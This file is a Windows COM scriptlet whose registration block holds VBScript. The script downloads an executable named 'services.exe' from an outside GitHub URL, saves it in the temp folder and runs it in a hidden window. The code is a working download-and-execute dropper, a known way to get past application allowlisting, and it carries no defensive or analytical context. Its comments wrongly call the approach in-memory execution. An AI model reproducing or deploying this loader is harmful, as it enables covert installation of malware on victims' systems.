
<scriptlet>
  <registration
    progid="example"
    classid="{F0001111-0000-1111-0000-000011112222}">
    <script language="VBScript">
      <![CDATA[
        Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
        objXMLHTTP.open "GET", "https://raw.githubusercontent.com/deux1337/cyberdeux/blob/main/services.exe", False
        objXMLHTTP.send()

        ' Create an instance of the WScript.Shell object
        Set objShell = CreateObject("WScript.Shell")

        ' Store the response in a variable and execute it directly in memory
        Dim strCommand
        strCommand = objXMLHTTP.responseBody

        ' Create temporary file in memory to run
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        tempFile = objFSO.GetSpecialFolder(2) & "\services.exe"
        Set tempStream = objFSO.CreateTextFile(tempFile, True)
        tempStream.Write strCommand
        tempStream.Close

        ' Execute the downloaded file
        objShell.Run tempFile, 0, False
      ]]>
    </script>
  </registration>
</scriptlet>
